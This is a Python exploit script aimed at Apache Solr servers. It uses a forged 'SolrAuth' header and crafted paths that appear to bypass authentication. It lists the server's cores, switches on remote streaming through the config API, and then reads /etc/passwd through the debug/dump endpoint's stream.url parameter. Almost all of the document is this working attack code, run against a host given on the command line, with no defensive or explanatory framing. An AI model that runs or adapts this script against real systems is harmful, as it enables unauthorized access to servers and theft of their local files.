#!/usr/bin/python3
import requests import json import argparse import warnings
url0 = '/solr/admin/cores:/admin/info/key?indexInfo=false&wt=json'
url1 = '/solr/{}/config:/admin/info/key' url2 = '/solr/{}/debug/dump:/admin/info/key?param=ContentStreams&stream.url=file:///etc/passwd'
warnings.filterwarnings("ignore")
parser=argparse.ArgumentParser() parser.add_argument("--host", help="input the vulnerable host", type=str) args = parser.parse_args()
host = args.host print(host)
headers1 = { 'SolrAuth': 'test', }
params1 = { 'indexInfo': 'false', 'wt': 'json', }
headers2 = { 'SolrAuth': 'test', 'Content-Type': 'application/json', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82Safari/537.36', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9', # 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6', 'Connection': 'close', }
headers3 = { 'SolrAuth': 'test', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82Safari/537.36', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9',
'Accept-Language': 'zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6', 'Connection': 'close', }
json_data = { 'set-property': { 'requestDispatcher.requestParsers.enableRemoteStreaming': True, }, }
try: response = requests.post( f'{host}{url0}', params=params1, headers=headers1, timeout=10 ) if response.status_code == 200 and "application/json" in response.headers.get("Content-Type", ""):
print(f"{host} ---> {len(response.text)} \n\n")
print(response.text)
print('\n\n\n' + '*'*78 + '\n\n\n')
data1 = None
data1 = json.loads(response.text)
if data1 != None:
status_data = data1.get("status", {})
for core_name, core_details in status_data.items():
print(f"Core Name: {core_name}")
temp_url = url1.format(core_name)
response = requests.post(f'{host}{temp_url}', headers=headers2, json=json_data,timeout=10)
if response.status_code == 200 and len(response.text) < 200:
print(f'{host}{temp_url} ---> {len(response.text)} \n\n')
print(response.text)
print('\n\n\n' +'*'*78 + '\n\n\n')
temp_url = url2.format(core_name)
response = requests.post(f'{host}{temp_url}', headers=headers2,timeout=10)
if response.status_code == 200:
print(f'{host}{temp_url} ---> {len(response.text)} \n\n')
print(response.text)
else:
pass
except requests.exceptions.HTTPError as http_err: pass#print(f"HTTP 错误: {http_err}") except requests.exceptions.ConnectionError as conn_err: pass#print(f"连接错误: {conn_err}") except requests.exceptions.Timeout as timeout_err: pass#print(f"请求超时: {timeout_err}") except requests.exceptions.RequestException as req_err: pass#print(f"请求错误: {req_err}")